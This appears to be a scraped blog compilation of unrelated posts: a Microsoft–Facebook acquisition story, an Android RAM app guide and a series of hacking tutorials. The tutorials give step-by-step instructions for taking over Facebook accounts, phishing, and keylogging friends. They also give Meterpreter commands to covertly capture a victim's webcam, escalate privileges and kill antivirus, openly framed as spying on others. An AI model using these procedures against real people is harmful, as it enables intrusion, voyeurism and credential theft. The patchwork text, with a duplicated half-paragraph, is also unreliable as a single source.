Microsoft Wanted To Buy Facebook For $24 billlion But Mark Zuckerbarg says No

Microsoft spent $26.2 billion to take over LinkedIn, and if you think the software giant is spending too much money, here’s something that could make you change your mind.

Redmond was ready to pay almost as much money on taking over Facebook a long time ago when the social network wasn’t really this popular, but according to recent reports, it was Mark Zuckerberg who refused the deal.

Former Microsoft CEO Steve Ballmer revealed in an interview with CNBC on Friday that his company was interested in buying Facebook when it was “itsy-bitsy” and the amount of money it would have paid reached $24 billion. Zuckerberg refused, though, and considering where Facebook is right now, he clearly made the right decision.

Related  CryptoWall ransomware scam made over $1Million
“Oh I think $24 billion when the company was itsy-bitsy and he said no. And I respect that,” Ballmer, who is now the owner of the Los Angeles Clippers, revealed.

Four Ways To Hack And Crack Facebook Username And Password

NULL BYTE

HOW TO
4 Ways to Crack a Facebook Password & How to Protect Yourself from Them

Despite the security concerns that have plagued Facebook for years, most people are sticking around and new members keep on joining. This has led Facebook to break records numbers with over one billion monthly active users as of October 2012—and around 600 million active daily users.

We share our lives on Facebook. We share our birthdays and our anniversaries. We share our vacation plans and locations. We share the births of our sons and the deaths of our fathers. We share our most cherished moments and our most painful thoughts. We divulge every aspect of our lives. We even clamor to see the latest versions even before they're ready for primetime.

But we sometimes forget who's watching.

We use Facebook as a tool to connect, but there are those people who use that connectivity for malicious purposes. We reveal what others can use against us. They know when we're not home and for how long we're gone. They know the answers to our security questions. People can practically steal our identities—and that's just with the visible information we purposely give away through our public Facebook profile.

Image via Digital Trends
The scariest part is that as we get more comfortable with advances in technology, we actually become more susceptible to hacking. As if we haven't already done enough to aid hackers in their quest for our data by sharing publicly, those in the know can get into our emails and Facebook accounts to steal every other part of our lives that we intended to keep away from prying eyes.

In fact, you don't even have to be a professional hacker to get into someone's Facebook account.

It can be as easy as running Firesheep on your computer for a few minutes. In fact, Facebook actually allows people to get into someone else's Facebook account without knowing their password. All you have to do is choose three friends to send a code to. You type in the three codes, and voilà—you're into the account. It's as easy as that.

In this article I'll show you these, and a couple other ways that hackers (and even regular folks) can hack into someone's Facebook account. But don't worry, I'll also show you how to prevent it from happening to you.

Method 1
Reset the Password
The easiest way to "hack" into someone's Facebook is through resetting the password. This could be easier done by people who are friends with the person they're trying to hack.

The first step would be to get your friend's Facebook email login. If you don't already know it, try looking on their Facebook page in the Contact Info section.
Next, click on Forgotten your password? and type in the victim's email. Their account should come up. Click This is my account.
It will ask if you would like to reset the password via the victim's emails. This doesn't help, so press No longer have access to these?
It will now ask How can we reach you? Type in an email that you have that also isn't linked to any other Facebook account.
It will now ask you a question. If you're close friends with the victim, that's great. If you don't know too much about them, make an educated guess. If you figure it out, you can change the password. Now you have to wait 24 hours to login to their account.
If you don't figure out the question, you can click on Recover your account with help from friends. This allows you to choose between three and five friends.

It will send them passwords, which you may ask them for, and then type into the next page. You can either create three to five fake Facebook accounts and add your friend (especially if they just add anyone), or you can choose three to five close friends of yours that would be willing to give you the password.

How to Protect Yourself
Use an email address specifically for your Facebook and don't put that email address on your profile.
When choosing a security question and answer, make it difficult. Make it so that no one can figure it out by simpl

How to Protect Yourself
Use an email address specifically for your Facebook and don't put that email address on your profile.
When choosing a security question and answer, make it difficult. Make it so that no one can figure it out by simply going through your Facebook. No pet names, no anniversaries—not even third grade teacher's names. It's as easy as looking through a yearbook.
Learn about recovering your account from friends. You can select the three friends you want the password sent to. That way you can protect yourself from a friend and other mutual friends ganging up on you to get into your account.
Method 2
Use a Keylogger
Software Keylogger

A software keylogger is a program that can record each stroke on the keyboard that the user makes, most often without their knowledge. The software has to be downloaded manually on the victim's computer. It will automatically start capturing keystrokes as soon as the computer is turned on and remain undetected in the background. The software can be programmed to send you a summary of all the keystrokes via email.

CNET has Free Keylogger, which as the title suggests, is free. If this isn't what you're looking for, you can search for other free keyloggers or pay for one.

Hardware Keylogger

These work the same way as the software keylogger, except that a USB drive with the software needs to be connected to the victim's computer. The USB drive will save a summary of the keystrokes, so it's as simple as plugging it to your own computer and extracting the data. You can look through Keelog for prices, but it's bit higher than buying the software since you have the buy the USB drive with the program already on it.

How to Protect Yourself
Use a firewall. Keyloggers usually send information through the internet, so a firewall will monitor your computer's online activity and sniff out anything suspicious.
Install a password manager. Keyloggers can't steal what you don't type. Password mangers automatically fill out important forms without you having to type anything in.
Update your software. Once a company knows of any exploits in their software, they work on an update. Stay behind and you could be susceptible.
Change passwords. If you still don't feel protected, you can change your password bi-weekly. It may seem drastic, but it renders any information a hacker stole useless.

Phishing
This option is much more difficult than the rest, but it is also the most common method to hack someone's account. The most popular type of phishing involves creating a fake login page. The page can be sent via email to your victim and will look exactly like the Facebook login page. If the victim logs in, the information will be sent to you instead of to Facebook. This process is difficult because you will need to create a web hosting account and a fake login page.

The easiest way to do this would be to follow our guide on how to clone a website to make an exact copy of the facebook login page. Then you'll just need to tweak the submit form to copy / store / email the login details a victim enters. If you need help with the exact steps, there are detailed instructions available by Alex Long here on Null Byte. Users are very careful now with logging into Facebook through other links, though, and email phishing filters are getting better every day, so that only adds to this already difficult process. But, it's still possible, especially if you clone the entire Facebook website.

How to Protect Yourself
Don't click on links through email. If an email tells you to login to Facebook through a link, be wary. First check the URL (Here's a great guide on what to look out for). If you're still doubtful, go directly to the main website and login the way you usually do.
Phishing isn't only done through email. It can be any link on any website / chat room / text message / etc. Even ads that pop up can be malicious. Don't click on any sketchy looking links that ask for your information.
Use anti-virus & web security software, like Norton or McAfee.

Stealing Cookies
Cookies allow a website to store information on a user's hard drive and later retrieve it. These cookies contain important information used to track a session that a hacker can sniff out and steal if they are on the same Wi-Fi network as the victim. They don't actually get the login passwords, but they can still access the victim's account by cloning the cookies, tricking Facebook into thinking the hacker's browser is already authenticated.

Image via Wikimedia Commons
Firesheep is a Firefox add-on that sniffs web traffic on an open Wi-Fi connection. It collects the cookies and stores them in a tab on the side of the browser.

From there, the hacker can click on the saved cookies and access the victim's account, as long as the victim is still logged in. Once the victim logs out, it is impossible for the hacker to access the account.

A Couple More Facebook Hacks
For those with a bit more technical skill, check out the Same Origin Policy Facebook hack and the somewhat easier, Facebook Password Extractor. We will continue add more Facebook hacks in the near future, so keep coming back here.

How to Protect Yourself
On Facebook, go to your Account Settings and check under Security. Make sure Secure Browsing is enabled. Firesheep can't sniff out cookies over encrypted connections like HTTPS, so try to steer away from HTTP.
Full time SSL. Use Firefox add-ons such as HTTPS-Everywhere or Force-TLS.
Log off a website when you're done. Firesheep can't stay logged in to your account if you log off.
Use only trustworthy Wi-Fi networks. A hacker can be sitting across from you at Starbucks and looking through your email without you knowing it.
Use a VPN. These protect against any sidejacking from the same WiFi network, no matter what website you're on as all your network traffic will be encrypted all the way to your VPN provider.
Protecting Yourself: Less Is More
Social networking websites are great ways to stay connected with old friends and meet new people. Creating an event, sending a birthday greeting and telling your parents you love them are all a couple of clicks away.

Facebook isn't something you need to steer away from, but you do need to be aware of your surroundings and make smart decisions about what you put up on your profile. The less information you give out on Facebook for everyone to see, the more difficult you make it for hackers.

If your Facebook account ever gets hacked, check out our guide on getting your hacked Facebook account back for information on restoring your account.

Bonus: If you're interested in who's checking you out, there are some ways you can (kindof) track who's viewed your Facebook profile.

How To Increase Cpu Ram Of Your Android Phone---No Rooting

RAMontrol Extreme (No Root)

RAM Control Extreme is another decent app to increase RAM in Android phone devices. The app doesn’t require root access and has several features built-in, including a task killer. The app has received over 100,000 downloads, however, some premium features are only included in the Pro version of the app, which costs about $2.99.

Step 1

Download and install RAM Control Extreme on your Android device. You can get the app by clicking the button below.

Step 2

Open the app, and go to the SETTINGS tab. Here you can select the RAM boosting levels such as normal, strong or extreme. You can also select the auto RAM boosting frequency to automatically increase RAM on your Android devices.

Step 3

Next, go to the RAMBOOSTER tab. Now, click on the Start button. This will start the Auto RAM booster and the app will start to increase RAM on your phone devices automatically at regular intervals so that you always have enough free RAM for multitasking.

Step 4

In order to increase RAM in Android phone devices manually, you can go to the TASK KILLER tab. Here, you can select the apps that you want to kill. After selecting the apps, simply click on the KILL button to kill the apps and increase the RAM.

Website Hacking

Hacking is a growing threat for every business both large and small. Whether it’s stealing private data, taking control of your computer, or shutting down your website, hackers can seriously impact any business, at any time in a number of ways.
Hacking Websites is one of the most the common techniques used by BlackHats and also Hacktivists. Whether by DDOSing or Remote File Inclusion Hacking websites offers the Hacking group or indivisual immense exposure, popularity and supposedly fame. There exist numerous ways to take control of or bring down a website. Below I discuss the ten most popular ways they can threaten the security of your site, and your business. These hacks alone account for over 90% of all Website Hacking Techniques: (It’s a long one, so make yourselves comfortable)
10. INJECTION ATTACKS
Injection attacks occurs when there are flaws in your SQL Database, libraries, or even the operating system itself. When exceptions are not properly accounted for, say whether password checking isn’t rigorous enough- Hackers can use this to obtain access to confidential information by fooling the system. They might gain unauthorized access to private data such as social security numbers, credit card number or other financial data.Injection attacks like SQL injection could have surprisingly commands and methods to access vital databases. SQL uses very simple queries to obtain information requested by users, which makes for a relatively easy hack.
9. CROSS SITE SCRIPTING ATTACKS
Cross Site Scripting, also known as an XSS attack, occurs when an application, URL-“get request”, or file packet is sent to the web browser window bypassing the validation process. Once an XSS script is triggered, it’s deceptive property makes users believe that the compromised page of a specific website is legitimate even though it has been compromised.
For example, say a website has an XSS script in it, the user might see a popup window asking for their contact information and other sensitive data, even though the actually website may not have anything to do with it.
In another example, the hacker might run commands cause the user’s session ID to be sent to the attacker’s website, allowing the hacker to hijack the user’s current session. That is, he may then be able to use this cookie to make the browser think that he is actually his victim and get complete and unrestricted access to his account (A form of identity theft).
8. BROKEN AUTHENTICATION AND SESSION MANAGEMENT ATTACKS
If the user authentication system of your website is weak, hackers might be able to take full advantage. Authentication systems involve passwords, key management, session IDs, and cookies that can allow a hacker to access your account from any computer (as long as they are valid).
If a hacker exploits the authentication and session management system, they can assume the user’s identity. (This is similar to the last one – XSS) Ask yourself these questions to find out if a website is vulnerable to a broken authentication and session management attack:
►Are user credentials weak (e.g. stored using hashing or encryption)?
►Can credentials be guessed or overwritten through weak account management functions (e.g. account creation, change password, recover password, weak session IDs)?
►Are session IDs exposed in the URL (e.g. URL rewriting)?
►Are session IDs vulnerable to session fixation attacks?
►Do session IDs timeout and can users log out?
If you have your own website and if the answer to any of these questions is “yes”, your site could be vulnerable to a attack.
7. CLICKJACKING ATTACKS
Clickjacking, also called a UI Redress Attack, is when a hacker uses multiple opaque layers to trick a user into clicking the top layer without them knowing. What I mean by that is, the hacker is able to show his own content on a “naive” website. Perhaps an adf.ly link and he could be earning easy money. Thus the attacker is “hijacking” clicks that are not meant for the actual page, but for a page where the attacker want you to be

Another example, using a carefully crafted combination of stylesheets, iframes, and text boxes, a user can be led the user to believe they are typing in the password for their bank account, but are actually typing into an invisible frame controlled by the attacker. The website might function normally for the unsuspecting user, but behind the scenes their vital information will be in the hands of the attacker.
6. DNS CACHE POISONING
DNS Cache Poisoning involves old cache data that you might think you no longer have on your computer, but is actually “toxic”. Also known as DNS Spoofing, hackers can identify vulnerabilities in a domain name system, which allows them to divert traffic from legit servers to a fake website and/or servers. This form of attack can be programmed to spread and replicate itself from one DNS server to another DNS, “poisoning” everything in it’s path.
In fact, in 2010, a DNS poisoning attack completely compromised the Great Firewall of China (GFC- Yes, it’s a thing) temporarily and censored certain content in the United States until the problem was fixed.
5. SOCIAL ENGINEERING ATTACKS
A social engineering attack is not technically a “hack”. When someone first finds out what exactly it is, they are surprised that it actually works. So was I, but indeed it does work.
It happens when you divulge private information in good faith, such as a credit card number, through common online interactions such as email, chat, social media sites, or virtually any website. The problem, of course, is that you’re not getting into what you think you’re getting into.
A classic example of a social engineering attack is the popular “Microsoft tech support” scam. This is when someone from a call center pretends to be a MS tech support member who says that your computer is slow and/or infected, and can be easily fixed – at a cost, of course. Considering that most computers are indeed quite slow and hang sometimes, this scam is quite well written. Of course, it need not be about money and most often it isn’t. Telling someone the name of your first pet might actually be giving them complete access to your account. Surprised? This is actually one of the most common security questions.
4. SYMLINKING – AN INSIDER ATTACK
A symlink (Symbolic Link) is basically a special file that “points to” a hard link on a mounted file system. A symlinking attack occurs when a hacker positions the symlink in such a way that the user or application that access the endpoint thinks they’re accessing the right file when they’re really not.(Read that again)
If the endpoint file is an output, the consequence of the symlink attack is that it could be modified instead of the file at the intended location. Modifications to the endpoint file could include appending, overwriting, corrupting, or even changing permissions.
Meaning, the user might be doing one thing, but another is actually happening. In different variations of a symlinking attack a hacker may be able to control the changes to a file, grant themselves advanced access, insert false information, expose sensitive information or corrupt and destroy vital system databases or application files.
3. CROSS SITE REQUEST FORGERY ATTACKS
A Cross Site Request Forgery Attack happens when a user is logged into a session (or account) and a hacker uses this opportunity to send them a forged HTTP request to collect their cookie information.
In most cases, the cookie remains valid as long as the user or the attacker stays logged into the account. This is why websites ask you to log out of your account when you’re finished and close the window after logging out – it will expire the session immediately.
In other cases, once the user’s browser session is compromised, the hacker can generate requests to the application that will not be able to differentiate between a valid user and a hacker. Another identity theft- the hacker confuses the server as to who he actually is.

2. REMOTE CODE EXECUTION ATTACKS
The most devastating in the whole list, a Remote Code Execution attack is a result of either server side or client side security weaknesses.
Vulnerable components may include libraries, remote directories on a server that haven’t been monitored, frameworks, and other software modules that run on the basis of authenticated user access. Applications that use these components are always under attack through things like scripts, malware, and small command lines that extract information.
In this attack, the hacker is basically able to get complete access to the website’s server itself. How is that so devastating? This gives him access to every bit and byte of information stored in the database(If the request is coming from the server itself, why would it be denied? That’s what it’s build for). He may also obtain access to the website’s actual code that the browser then shows the user.Meaning, he could totally wipe out the website, mess with the links and buttons, show his own stuff – Sky’s the limit. Plus there’s usually only one way to recover – Rebuild. But this also makes for quite a complicated attack, details of which aren’t suitable to be disclosed here.
1. DDOS ATTACK – DISTRIBUTED DENIAL OF SERVICE ATTACK
The most popular and most widely used,the DDoS attack (Distributed Denial of Services), is where a server or a machine’s services are made unavailable to its users.
The usual agenda of a DDoS campaign is to temporarily interrupt or completely take down a successfully running system.
The most common example of a DDoS attack could be sending tons of URL requests to a website or a webpage in a very small amount of time. This causes bottlenecking at the server side because the CPU simply runs out of resources.
Denial-of-service attacks are considered violations of the Internet Architecture Board’s Internet proper use policy, and also violate the acceptable use policies of virtually all Internet service providers- DDoSing is highly illegal.
It's only fair to share...

Hacking Webcam

It’s time to let out your inner creep. In this tutorial, we’ll be taking a look at how we can hack a webcam remotely and take a peek at what’s going on at the other side. We’ll use the powerful Meterpreter to hack into the victim’s webcam. We’ll take full control of the webcam, turn it on and get snapshots without anyone ever finding out (ideally).
In early 2014, a hacker was sentenced to 18 months for doing just this to Miss Teen USA, 2013. He broke into the computer, took a few clicks and blackmailed the victim to send more photos. (Google it up for more information) While the exact method he used is unknown, it’s very likely this exact method that we’ll be trying out. The point of this tutorial is to show just how easy it really is. While developing your own hacks and discovering loop holes is a whole different level of hacking, quite a lot of hacking can be done just by knowing a surprisingly small number of things. Perhaps not even that, after all we can simply search an exploit in metasploit and a get a whole list of things that’ll work. The hard part of hacking is breaking into a system while maintaining anonymity. Once that is done, we pretty much own the target system. Hacking is not about being a computer geek as much as being ‘in the know’.
Our best friend Meterpreter is going to help us with this hack. With Meterpreter we can install a keylogger, hack the webcam and the list goes on and on. You can basically do almost anything that you can do on your own computer, to your victim. All we need for this hack, is to first break in with Metasploit and install meterpreter on their system. How do we do that?
After picking an attack module to exploit a vulnerability, we have the option to set a payload. The payload tells metasploit what to do on the victim’s computer once it breaks in. Meterpreter is a payload. The command usually looks like:
Set payload windows/meterpreter/reverse_tcp
If the attack was successful, metasploit automatically installs meterpreter on the target system and we can move on to hacking the webcam, in this case. We can also get our meterpreter session by using exploits like Aurora (for IE6). After getting the meterpreter session in our command, you can follow the steps below to hack the webcam.
Step 1: Find if there is a webcam.
Metasploit’s Meterpreter has a built-in module for searching and controlling the remote system’s webcam (Because apparently there are so many creepy hackers that we now have this hack at our fingertips). We can start off by searching if the system even has a webcam or not.me. The command below is used for that, it also returns us the name of the webcam.
meterpreter > webcam_list
If a webcam was found, Meterpreter will them all out. Usually we just find one.
Step 2: Say Cheese!
If the last command gave us a webcam we can go ahead and snap a photo:
meterpreter > webcam_snap
If all went fine a picture will be saved in the directory: /opt/framework3/msf3 We can simply go there and see what we got. We can’t do anything about the quality of the image, it all depends on the webcam. Still, better than nothing, right?
Step 3: Streaming video.
So we got a picture, let’s see how to get a live video stream. We can do this by typing the command below: (We’re using –p parameter to specify the directory we want to give to the video streaming file)
meterpreter > run webcam -p /var/www
This command fires up the victim’s webcam and sends its video output to /var/www/webcam.htm. You can open up this file and check out what’s going on at the other end in live video feed.
Another thing that deservers mention here is the little light that is often found next to many laptop cameras and on some separate webcams too. Will the light be turned on by this hack? It depends on the way the camera manufacture implemented the ‘take a photo’ and ‘take a video’ functions and on which software is set as default to use the camera. So this hack is not all that risk-free. But then again, what’s life without a lit

How To Disable Anti-virus In An Enemy Computer

Installing antivirus software on your computer is an excellent way to deter hackers. Conversely, disabling antivirus software is an excellent way to totally exploit a system until nothing is left, while making sure we don’t leave a trace. If a hacker can somehow get in a system under the antivirus’s nose it is very likely that he\she will get caught if the antivirus scans the system for malicious files and connections. Protecting oneself is more important than exploiting the victim.
Meterpreter gives us complete control over the system. We can send commands to install a keylogger, jump to other computers on the network, look through all the files and directories, start and close programs at our will and tons more. Here, we’ll be looking at the commands we can use to disable antivirus protection.
If you have an antivirus on your computer, try to close it from the tray icon or the GUI. You’ll see that it asks you to confirm your action. Now open up task manager and try to kill the antivirus process file (something like avg.exe), (usually) you’ll find that now no questions are asked and the antivirus process is killed instantly. That’s because the admin has more control over the system than the antivirus, which is exactly what we’ll use to carry out this hack.
Again, this tutorial is assuming that you’ve already embedded a Meterpreter listener on the victim’s computer.
First of all, we need to escalate our privileges. Usually, when we hook up a listener (Meterpreter) on the victim’s system, the listener have the same privileges as the user. Nowadays, more and more operating softwares (Windows 8, for example) give reduced privileges to a user, by default. This is to make sure that the user cannot tamper with important files (such as those in the system32 folder) and to add another layer of protection from hacking. To carry out this hack we need admin (or sysadmin) privileges.
Step 1: Get the user ID
Before attempting to increase our privileges, let’s check to see if we’re already the admin. Why? Because, sometimes being lazy and efficient are the same. It’s unlikely, but on the off chance that we do turn out to be admin, we can get straight to the hack. Type:
meterpreter > getuid
Now this should return the ID of the user currently logged in. Depending on the OS this statement gives different results. What we’re looking for are the keywords “admin”, “sysadmin”, “authority”, “system”. These are bound to be associated with an account with admin privileges. Chances are that we’ll get something that’s not like this. In the next step we take care of that.
Step 3: Escalate Privileges
This is quite easy. Just one command:
meterpreter > getsystem
One of the most common returns to the getuid after this command is
Server username : NT Authority\System
This is what we’re looking for ideally. But if you get any of the above keywords, that’s just fine as well. You’ll notice that Metasploit responds with something like “…got system (with technique 1)”if everything went as planned. There are multiple in built functions that metasploit uses to try to increase privileges when ‘getsystem’ command is sent. It simply tries out all of them to see which one works.
Step 5: Kill the antivirus
Now we have the power of the admin. What do we want next? More power, of course. Metasploit has a Ruby script called killav.rb which looks for any antivirus process that are running and shuts them down. It works on almost all of the antiviruses so we can be reasonably sure that it’ll do the job. (If it doesn’t, we could alternatively look for running processes and try to kill them manually). Let’s run the script by typing:
meterpreter > run killav.rb
You should see an output like “Killing antivirus…” and we’re done, the antivirus is taken care of and can no longer interfere with our further activities. Ideally, you want to make sure that you’re hidden before trying out any hacks.
It's only fair to share...

How To UpRoot Virus From Your Computer As An Hacker

How to remove and avoid computer viruses ?
A computer virus is malicious software (also known as “malware”) that can copy itself and infect other software or files on your computer.
If you suspect your computer has been infected, then several antivirus websites provides step-by-step instructions for removing viruses and other malware.
Fortunately, if you update your computer and use free antivirus software such as AVG, you can help permanently remove unwanted software and prevent installation in the first place.
How do I know if my computer has been infected? After you open and run an infected program or attachment on your computer, you might not realize that you’ve introduced a virus until you notice something isn’t quite right. Here are a few indicators that your computer might be infected:
►Your computer runs more slowly than normal.
►Your computer stops responding or freezes often.
►Your computer crashes and restarts every few minutes.
►Your computer restarts on its own and then fails to run normally.
►Applications on your computer don’t work correctly.
►Disks or disk drives are inaccessible.
►You can’t print correctly.
►You see unusual error messages.
►You see distorted menus and dialog boxes.
These are common signs of infection—but they might also indicate hardware or software problems that have nothing to do with a virus. Unless you run some kind of Malicious Software Removal Tool and install industry-standard, up-to-date antivirus software on your computer, there is no way to be certain if your computer is infected with a virus or not. Beware of messages warning you that you’ve sent email that contained a virus. This can indicate that the virus has listed your email address as the sender of tainted email. This does not necessarily mean you have a virus. Some viruses have the ability to forge email addresses. In addition, there is a category of malware called rogue security software that works by causing fake virus alerts to pop up on your computer.
How do I install updates and antivirus software if I can’t use my computer? It might be difficult to download tools or update your computer if your computer has a virus. In this case, you can try one of the following options:
►Use another computer to download the tools to a disk.
►Get help through your Antivirus’s website support.
►Have your system checked by a Technician
How can I prevent infection by computer viruses?
Nothing can guarantee the security of your computer, but there’s a lot you can do to help lower the chances that you’ll get a virus.
It’s crucial to keep your antivirus software current with the latest updates (usually called definition files) that help the tool identify and remove the latest threats. You can continue to improve your computer’s security and decrease the possibility of infection by using a firewall, keeping your computer up to date, maintaining a current antivirus software subscription, and following a few best practices.
Tip: Because no security method is guaranteed, it’s important to back up critical files on a regular basis.

How To Gather Secret Information Online

Nmap (“Network Mapper”) is a free and open source utility for network exploration and security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters//firewalls are in use, and dozens of other functions. It was designed to rapidly scan large networks, but works just fine against single hosts. Nmap runs on all major computer operating systems, and both console and graphical versions are available. But while learning using console is always better so as to give the user an idea of every little thing that is happening, Hence I’ll be using only console here.
Nmap is built in feature of Metasploit, so you won’t have to download anything. Before starting I implore the user to view the inbuilt help secion in every backtrack tool, experiment with every single option since it is only by doing can one learn Pen Testing.(For example, simply typing “nmap” in console opens up the help section) Open Metasploit console or the BackTrack konsole and type: Nmap (IP Address) -(options that you want).
For example:
nmap 192.168.2.104 -sV This would give us all the services that are running and their version. If they are outdated, they are more likely to be exploitable.
Take note of service names. For example, if you see MSRPC running on port 135, then in metasploit console type:
search MSRPC
This would return all exploits that could be used later on. However, what if we got this as a scan result?
Microsoft-DS 445/TCP Open# Smb directly over IP
We could also go to http://www.metasploit.com and type service name in the search box. It might return a matching exploit that we need, if not the service might be new or is not exploitable – Move on to the next. ExploitDB is also very useful. (http://www.exploit-db.com)
You will often find yourself in a situation where target is protected by firewall. To scan for open ports when he has it turned on, do:
nmap (IP) -sV -Pn
Over time you will memorize a lot of exploits. But always remember that there is always much more to learn, you just must be willing to give it all you got.(In fact, the Metasploit database is updated several times a day so even the experts have a tough time keeping up !). (You will learn to exploit in the next sections)
Nessus:
Nessus is world’s leading and most popular vulnerability scanner and for a good reason. It’s awesome. It finds all vulnerabilities and makes the job much easier because you can import nessus scan to metasploit and directly get to exploiting. This will automatically find any exploits straight away usable against any target. Okay, so let’s start! Setting up Nessus requires some formalities. First we need to make an account. Go to http://www.nessus.org/products/nessus and register(It’s in the download link).
Activation code will be sent to your email address. You want to copy it. Now open Backtrack console and type:
/opt/nessus/bin/nessus-fetch -register *Your code*
Nessus will start fetching latest plugins. This might take a while so be patient. Next, you want to create a new user. Do this by typing:
/opt/nessus/sbin/nessus-adduser
Now input your username and password. That’s it. Now we need to start Nessus itself. In console, type:
/etc/init.d/nessusd start
You have successfully installed Nessus on BackTrack.
Open Nessus interface by going to this address in your browser.
http://127.0.0.1:8834
Input Username and Password and you’re in. Nessus has some pretty cool features. You can add your own Policies by clicking on Policies tab. There you can enable/disable Nessus scan options.
Let’s continue. Click scans and then hit add. Input scan name, Policy and Input Address/es that you want to scan. For local network scan choose network policy. For scanning over Internet choose policy that will scan external IPs. After the scan is complete, click on it and then click download report. Save it as .nbe file that we will use later on. This can be later used for automated exploitation.
This is the absolute minimum any BackTrack user should know about Reconnaissance. Due to space restrictions, I don’t think it would be practical to list every single option for every single BackTrack tool here, in this website. Every situation needs a different set of actions, which one can only learn by him/herself. So, look around and check out every single option offered by the various tools in BackTrack and you just might find something that can make your goal for hacking something extremely easier.

How To Do KeyLogging ---A Way To Spy Your Friends Password And Username

In this tutorial, we’ll attempt to remotely install a keylogger. This one is actually quite basic, so without further ado, let’s begin.
Fire up Metasploit and let’s get started. Like before, we’re assuming that the system has already been broken into and we have the meterpreter session.
Step 1: Find a program.
The way the keylogger in Meterpreter works is, you have to attach it to a running program. Say for example, we find that the victim’s computer is running an internet browser, a game and MS Word. Clearly there’s two items of interest in there. We can attach the keylogger to the browser or MS Word to get whatever’s being typed in these two applications. So, first we check what all processes are running on the target system using the following command:
meterpreter >ps
Usually you’ll get a very long list of items. The two columns we’re interested in are PID (Process ID) and process name. For this step you may want to google up the names of some processes to see which programs they belong to or if you find the ones you know of, like chrome.exe (Google Chrome) or notepad.exe then you can use these. We need to migrate meterpreter to the corresponding PID. Suppose we found wordpad.exe at PID=1440
meterpreter > migrate 1440
You should see a message “Migration completed successfully”.
Step 2: Start the Keylogger
Now we can embed the keylogger into the program.The Meterpreter keylogger is a built-in feature called keyscan. We can start it up by the following command:
meterpreter> keyscan_start
This should successfully attach the keylogger to our preferred program and the keylogging will start immediately.
Step 3: Dump the logged Keystrokes
So, in the previous step we hooked up a keylogger to the WordPad application running on our victim’s computer. It’ll keep running until we tell it to stop (or the victim shuts down the computer). We can recover whatever the keylogger has logged by the following command. You might want to wait a while, maybe grab a snack while the keylogger is running on the system just to give it enough time to log something. It’s pretty much hit and trial since we don’t know when the victim is going to choose the application we’re keylogging and type something in it. They could be typing in it just as we hooked up the keylogger or they may not use the application for hours.
meterpreter> keyscan_dump
If all went great and the victim actually typed something in our chosen application meterpreter will print out everything in our command shell. You could try using different applications to get different results. Obviously you’ll not get anyone’s passwords by keylogging WordPad whereas chrome.exe and firefox.exe are much more likely to give us something of more interest.

What To Do If Your Computer Get Hacked

As the news of several accountants’ computers being hacked by criminal gangs, the security of your computer on Internet is again under scanner. As the use of Internet is increasing, the chances of your computer getting hacked are also increasing dramatically. There is plenty of file sharing and web surfing that is being done, which makes your computer vulnerable for attack. But this article will help you in deciding what steps to take if your computer gets hacked.

How to Find if Your Computer is Hacked?

It is important to know when your computer has been actually hacked and when it is just behaving weird:

Sometimes it’s just simple and the hacker may leave some note or warning to prove that your computer is actually hacked.
You are not able to access your various mails and social media accounts or at worst you are not able to access your computer.
Steps to Take if Your Computer Gets Hacked:

1. Check the Impact of Damage

After using your computer for some time you would know what type of infection you are facing whether it’s malware, virus, trojan, keylogger (spyware) or anything else. In case a keylogger application is installed, you can use a good antispyware program to remove the infection. However, formatting the hard drive is a better option if the infection is severe. You should try to back-up all the important and confidential files that you may have in your computer before formatting.

2. Damage Control

You should run antivirus programs to determine the extent of damage. Users of Windows OS can run “Malware bytes” which can be found freely and recognises various harmful applications which antivirus cannot. Sophos Mac antivirus is a free application which can be used by Mac users.

3. Removal

After running several scans you will know what is the extent of damage you are facing. After making the list of viruses and malware that have infected your computer, next thing you need to find is what the impact of damage is. For that you must check the details about those viruses and malware programs to know how they rank in terms of damages they can have in your computer. You must carry out the searches from a neutral device which is not hacked and search for removal tools for those malware programs which have infected your computer. Unfortunately, if after several tries you are not able to clean your computer then the only option left is to re-install your operating system.

4. Offline Hacking

This is true that Internet is the most common way to hack a computer, but it is possible that anybody can hack your system using USB devices. The process of removal of the infection is the same in this case as well. The best precaution you can take to avoid such situations is to password protect your computer OS and BIOS. This makes it difficult for anyone to gain access to your computer.

Conclusion:

The best thing that you can do is to protect your computer by using fully updated antivirus and a good firewall. It is also wise to have a protection tool for windows registry. To protect your files, you can use encryption tools so as to encrypt the data on your hard disk. As there is no 100% foolproof way to prevent hacking it is always better to take precautionary measures.

How To Hack A Computer

The question “how to hack a computer” is probably the one that is most frequently asked by many Internet users and hacking enthusiasts. So, in order to address some of the common questions and doubts on the subject, I have decided to write down this article. If you are looking for information on possible ways to hack a computer, this post can surely help you out.

What Computer Hacking Really Means?

Computer hacking is a vast subject and it has several different meanings. For example, when someone superficially asks how to hack a computer, it can simply mean how to break the password of a local or remote computer so as to gain access to it. However, hacking is not only that which involves breaking into a computer. If you go deeper, computer hacking can also involve things like techniques to bypass the authentication of a system, hack Internet users, computer databases, software programs and so on.

So, to define in simple words computer hacking is a means of exploiting the weakness in a computer system or network in order to gain unauthorized access to its data or take advantage of it.

How Can I Begin to Hack?

To hack a computer, you need to do know how computers actually work and learn some basic concepts on the subject. If you are serious and passionate about it, you can take up an ethical hacking course that will help you master the skills. You can pick up a book that will teach you the concepts of computer hacking right from the basics. If you are a beginner, we recommend the book “Hacking Secrets Exposed” which is an excellent source of information to start off.

What Skills Do I Need to Hack a computer?

Even though there exists a lot of ready-to-use tools and programs on the Internet, you should possess at least a fair amount of computer knowledge to make use of them. Things like basics of operating system, computer networks and their protocols, firewalls and knowledge of how each of these work seems necessary. If you want to take it up as a profession and want to become an ethical hacker or penetration tester you will have to go a few steps further and consider learning operating systems like Unix/Linux and also programming languages like C, PHP, JavaScript, SQL etc.

If you are completely new to hacking and only have a basic knowledge of computer, you can refer freely available resources on the Internet to develop your skills. However, if you need an easy to follow guide with all the necessary resources at one place and don’t mind spending a few dollars, go for the book Hacking Secrets Exposed which is a perfect source of learning for beginners and intermediate readers.

Is Computer Hacking Legal?

In most cases hacking a computer without the permission of its owner is considered illegal. However, there are many ethical hackers who are hired by large companies and government organizations with special permissions to break into a computer in cases such as catching a cyber criminal or terror group. Sometimes penetration testers are given prior permission to hack computers so that possible vulnerabilities could be found and patched up before another hacker exploits it. In such cases it is completely legal to hack a computer.

Hacking For Beginners

